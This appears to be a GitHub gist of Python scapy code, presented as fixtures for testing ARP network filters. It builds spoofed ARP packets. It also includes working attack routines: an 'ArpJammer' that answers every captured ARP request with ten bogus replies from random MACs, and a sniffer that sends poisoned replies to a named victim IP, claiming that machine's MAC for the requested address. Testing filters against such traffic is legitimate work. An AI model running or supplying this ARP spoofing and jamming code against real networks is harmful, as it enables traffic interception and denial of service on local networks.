@santa4nt
Created February 28, 2013 19:23
Some quick-n-dirty sample code and functions to manipulate ARP packets (for network filter testing).
from scapy.all import *
# Hardware address written into the sender (hwsrc) field of every frame this
# file builds; change this to your test machine's MAC address
SELF_MAC = '00:0c:29:67:22:c2'
# Ethernet broadcast address, used as the frame destination wherever a packet
# is not directed at one specific host
BCAST_MAC = 'ff:ff:ff:ff:ff:ff'
# this builds (but does not send) a PROBE ARP request packet for the supplied IP address argument
def create_ARP_request_probe(ipaddr_to_probe):
    """Build an ARP probe asking who has *ipaddr_to_probe*.

    The sender protocol address is 0.0.0.0 and the frame is broadcast, which
    is the shape of an address-conflict probe. It is a benign fixture: a
    filter under test should let this through.

    Returns the Ether/ARP packet; nothing is sent here.
    """
    probe_fields = {
        'psrc': '0.0.0.0',
        'hwsrc': SELF_MAC,
        'pdst': ipaddr_to_probe,
    }
    return Ether(dst=BCAST_MAC) / ARP(**probe_fields)
# this builds (but does not send) a gratuitous REQUEST ARP packet, pretending to have the IP
# address set to `ipaddr_to_broadcast`
def create_ARP_request_gratuitous(ipaddr_to_broadcast):
    """Build a gratuitous ARP request announcing *ipaddr_to_broadcast*.

    Sender and target protocol addresses are both the announced IP and the
    frame is broadcast. Since a gratuitous request from an unexpected MAC is
    also what cache poisoning looks like, this is the fixture for checking
    that a filter or DAI-style check notices an IP/MAC mismatch.

    Returns the Ether/ARP packet; nothing is sent here.
    """
    frame = Ether(dst=BCAST_MAC)
    announcement = ARP(
        psrc=ipaddr_to_broadcast,
        hwsrc=SELF_MAC,
        pdst=ipaddr_to_broadcast,
    )
    return frame / announcement
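def create_ARP_request_directed(
        ipaddr_target,
        ipaddr_src_spoof,
        eth_dest=BCAST_MAC):
    """Build an ARP request for *ipaddr_target* whose sender IP is *ipaddr_src_spoof*.

    Args:
        ipaddr_target: protocol address the request asks about (the test
            host's real IP address).
        ipaddr_src_spoof: protocol address written into the sender field;
            it need not belong to this machine, which is precisely the
            mismatch an ARP filter under test should flag.
        eth_dest: Ethernet destination; broadcast by default, or the test
            host's real MAC address to deliver the frame unicast.

    Returns:
        The Ether/ARP packet; nothing is sent here.
    """
    # Fix: the original referenced an undefined lower-case ``self_mac``
    # (NameError on every call); the module constant is SELF_MAC.
    arp = ARP(psrc=ipaddr_src_spoof, hwsrc=SELF_MAC, pdst=ipaddr_target)
    eth = Ether(dst=eth_dest)
    return eth / arp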
# similar to create_ARP_request_gratuitous, except it uses a RESPONSE ARP packet
# with op code 2 (is-at)
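def create_ARP_response_gratuitous(ipaddr_to_advertise):
    """Build a gratuitous ARP reply (op=2, is-at) advertising *ipaddr_to_advertise*.

    Like create_ARP_request_gratuitous but as a reply: sender and target
    protocol addresses are the advertised IP, both hardware fields are this
    machine's MAC, and the frame is broadcast. An unsolicited broadcast reply
    is a classic cache-poisoning shape, so a filter under test should drop it
    (or at least log it).

    Returns:
        The Ether/ARP packet; nothing is sent here.
    """
    # Fix: the original used the undefined names ``self_mac`` and
    # ``broadcast_mac`` (NameError on every call); the module constants are
    # SELF_MAC and BCAST_MAC.
    arp = ARP(
        psrc=ipaddr_to_advertise,
        hwsrc=SELF_MAC,
        pdst=ipaddr_to_advertise,
        hwdst=SELF_MAC,
        op=2,
    )
    eth = Ether(dst=BCAST_MAC)
    return eth / arp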
# create an unsolicited ARP RESPONSE packet to the target machine;
# could be used to spoof a response packet RIGHT AFTER seeing a request, to pretend to be `ipaddr_to_spoof`
def create_ARP_response_directed(
        ipaddr_to_spoof,
        ipaddr_target,
        mac_target):
    """Build a unicast ARP reply telling *mac_target* that *ipaddr_to_spoof* is at SELF_MAC.

    Both the Ethernet destination and the ARP target fields are the test host
    given by *ipaddr_target*/*mac_target*. Unless it is sent right after a
    matching request the reply is unsolicited, which is the case a filter or
    a host-side "reply must match a pending request" check should exercise.

    Returns the Ether/ARP packet; nothing is sent here.
    """
    reply = ARP(
        op=2,
        hwsrc=SELF_MAC,
        psrc=ipaddr_to_spoof,
        hwdst=mac_target,
        pdst=ipaddr_target,
    )
    return Ether(dst=mac_target) / reply
## !!! HOW TO SNIFF ARP PACKETS (and possibly respond with SPOOFS) !!! ##
## First, some sample code (taken from http://www.craigdodd.co.uk/posts/exploiting-arp-with-python) ##
import threading
import time
from scapy.all import *
class ArpJammer(threading.Thread):
    """Thread that answers one captured ARP request with a burst of bogus replies.

    Built from the request packet *pkt*: each reply (op=2) claims the requested
    IP is at a random MAC and is unicast back to the requester's MAC. Ten
    replies are sent, two seconds apart. The detection signal this produces is
    a run of is-at replies for one IP whose sender MAC keeps changing.
    """

    def __init__(self, pkt):
        self.pkt = pkt
        self.pkt_count = 10  # replies sent per captured request
        super(ArpJammer, self).__init__()

    def run(self):
        request = self.pkt[ARP]
        bogus_reply = ARP()
        bogus_reply.op = 2
        bogus_reply.psrc = request.pdst
        # RandMAC is a scapy volatile value; presumably re-evaluated on each
        # build, i.e. each sendp below — verify against the scapy version used
        bogus_reply.hwsrc = RandMAC()
        bogus_reply.pdst = request.psrc
        bogus_reply.hwdst = request.hwsrc
        frame = Ether(dst=request.hwsrc) / bogus_reply
        for _ in range(self.pkt_count):
            sendp(frame)
            time.sleep(2)
def arp_monitor_callback(pkt):
    """sniff() callback: start an ArpJammer for every ARP request (op=1) seen."""
    if ARP not in pkt:
        return
    if pkt[ARP].op != 1:
        return
    ArpJammer(pkt).start()
def sniff_with_jammer():
    """Capture ARP traffic (store=0: nothing retained) and pass each packet to arp_monitor_callback."""
    sniff_opts = dict(prn=arp_monitor_callback, filter='arp', store=0)
    sniff(**sniff_opts)
## End sample ##
# IP address of the lab host whose ARP requests arp_monitor_spoofer answers;
# change this to the machine under test
VICTIM_IPADDR = '192.168.253.149'
def send_spoofed_ARP_response(pkt):
    """Answer the ARP request in *pkt* with a reply claiming the requested IP is at SELF_MAC.

    Reads the who-has target, sender IP and sender MAC from the request,
    builds a directed reply with create_ARP_response_directed and sends it.
    This is the positive test case for a filter: the reply's sender MAC does
    not belong to the real owner of the requested IP.
    """
    request = pkt[ARP]
    reply = create_ARP_response_directed(request.pdst, request.psrc, request.hwsrc)
    sendp(reply)
def arp_monitor_spoofer(pkt):
    """sniff() callback: reply only to ARP requests (op=1) whose sender IP is VICTIM_IPADDR."""
    is_request = ARP in pkt and pkt[ARP].op == 1
    if is_request and pkt[ARP].psrc == VICTIM_IPADDR:
        send_spoofed_ARP_response(pkt)
def sniff_with_spoofer():
    """Capture ARP traffic (store=0: nothing retained) and pass each packet to arp_monitor_spoofer."""
    sniff(filter='arp', store=0, prn=arp_monitor_spoofer)